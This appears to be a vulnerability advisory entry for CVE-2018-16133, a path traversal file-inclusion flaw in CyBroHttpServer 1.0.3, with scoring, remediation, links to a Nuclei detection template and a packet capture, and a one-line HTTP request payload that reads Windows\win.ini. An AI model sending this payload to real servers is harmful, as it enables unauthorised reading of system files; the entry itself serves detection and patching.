| Title | Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion |
|---|---|
| Author | 0x_Akoko |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system. |
| Remediation | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3. |
| CVSS Score | 5.3 |
| EPSS Score | 0.57542 |
| CVE ID | CVE-2018-16133 |
| CWE ID | CWE-22 |
| Tags | cve2018 cve lfi packetstorm cybrotech vuln |
Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.
GET \..\..\..\..\Windows\win.ini HTTP/1.1
Host: www.victim.com
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-16133.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-16133.pcap
N/AN/A